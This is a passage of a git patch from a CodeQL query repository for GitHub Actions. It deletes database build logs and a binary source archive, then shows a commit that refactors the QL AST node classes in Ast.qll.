13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+1 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:06:00] Trimming completed (3ms): Trimmed disposable data from cache. -[2024-03-01 13:06:00] Pausing evaluation to close the cache at sequence stamp o+2 -[2024-03-01 13:06:00] The disk cache is freshly trimmed; leave it be. -[2024-03-01 13:06:00] Unpausing evaluation -[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. -[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml -[2024-03-01 13:06:00] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml (3ms). -[2024-03-01 13:06:00] Plumbing command codeql dataset cleanup completed. -[2024-03-01 13:06:00] Plumbing command codeql database cleanup completed with status 0. -[2024-03-01 13:06:00] [PROGRESS] database finalize> Finished zipping source archive (20.00 KiB). -[2024-03-01 13:06:00] Plumbing command codeql database finalize completed. -[2024-03-01 13:06:00] [PROGRESS] database create> Successfully created database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. -[2024-03-01 13:06:00] Terminating normally. diff --git a/db/log/database-index-files-20240301.130558.974.log b/db/log/database-index-files-20240301.130558.974.log deleted file mode 100644 index e204c6df37d0..000000000000 --- a/db/log/database-index-files-20240301.130558.974.log +++ /dev/null @@ -1,44 +0,0 @@ -[2024-03-01 13:05:58] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:58] Log file was started late. -[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh. -[2024-03-01 13:05:59] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --format=json -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2... -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github... -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows... -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1... -[2024-03-01 13:05:59] Plumbing command codeql resolve files completed: - [ - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml" - ] -[2024-03-01 13:05:59] [DETAILS] database index-files> Found 26 files. -[2024-03-01 13:05:59] [PROGRESS] database index-files> /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh. -[2024-03-01 13:05:59] [PROGRESS] database index-files> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list] -[2024-03-01 13:05:59] Terminating normally. diff --git a/db/src.zip b/db/src.zip deleted file mode 100644 index 3006b787babfbfd5da405e1a7f5736ea762e4abe..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 20479 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 From e5527d7a181a0c37cd6fa3d8fd885f3ee1e3092b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 5 Mar 2024 19:59:43 +0100 Subject: [PATCH 086/707] Refactor ast nodes --- ql/lib/codeql/actions/Ast.qll | 281 ++++++++++++++++++++++------------ 1 file changed, 184 insertions(+), 97 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 89afd954d85c..1d86d81a063e 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -1,19 +1,51 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations +newtype TAstNode = + TWorflowNode(YamlNode n) or + TExpressionNode() + +class AstNode extends TAstNode { + abstract AstNode getAChildNode(); + + abstract AstNode getParentNode(); + + abstract string getAPrimaryQlClass(); + + abstract Location getLocation(); + + abstract string toString(); +} + +class ExpressionNode extends AstNode, TExpressionNode { + override string toString() { result = "expression node" } + + override AstNode getAChildNode() { none() } + + override AstNode getParentNode() { none() } + + override string getAPrimaryQlClass() { result = "ExpressionNode" } + + override Location getLocation() { none() } +} + /** * Base class for the AST tree. Based on YamlNode from the Yaml library. */ -class AstNode instanceof YamlNode { - AstNode getParentNode() { result = super.getParentNode() } +class WorkflowNode extends AstNode, TWorflowNode { + YamlNode n; + + WorkflowNode() { this = TWorflowNode(n) } - AstNode getAChildNode() { result = super.getAChildNode() } + override AstNode getParentNode() { result = TWorflowNode(n.getParentNode()) } - string toString() { result = super.toString() } + override AstNode getAChildNode() { result = TWorflowNode(n.getAChildNode()) } - string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } + override string getAPrimaryQlClass() { result = n.getAPrimaryQlClass() } - Location getLocation() { result = super.getLocation() } + override Location getLocation() { result = n.getLocation() } + + override string toString() { result = n.toString() } /** * Gets the enclosing workflow statement. @@ -24,7 +56,9 @@ class AstNode instanceof YamlNode { * Gets a environment variable expression by name in the scope of the current node. */ StringLiteral getEnvVar(string name) { - exists(Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | + exists(Env env | + env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), result.asYamlNode()) + | env.(StepEnv).getStep().getAChildNode*() = this or env.(JobEnv).getJob().getAChildNode*() = this @@ -32,16 +66,23 @@ class AstNode instanceof YamlNode { env.(WorkflowEnv).getWorkflow().getAChildNode*() = this ) } + + YamlNode asYamlNode() { result = n } + + YamlMapping asYamlMapping() { result = n } } /** A common class for `env` in workflow, job or step. */ -abstract class Env extends AstNode instanceof YamlMapping { } +abstract class Env extends WorkflowNode { } /** A workflow level `env` mapping. */ class WorkflowEnv extends Env { Workflow workflow; - WorkflowEnv() { workflow.(YamlMapping).lookup("env") = this } + WorkflowEnv() { + n instanceof YamlMapping and + workflow.asYamlMapping().lookup("env") = this.asYamlNode() + } /** Gets the workflow this field belongs to. */ Workflow getWorkflow() { result = workflow } @@ -51,7 +92,7 @@ class WorkflowEnv extends Env { class JobEnv extends Env { Job job; - JobEnv() { job.(YamlMapping).lookup("env") = this } + JobEnv() { job.asYamlMapping().lookup("env") = this.asYamlNode() } /** Gets the job this field belongs to. */ Job getJob() { result = job } 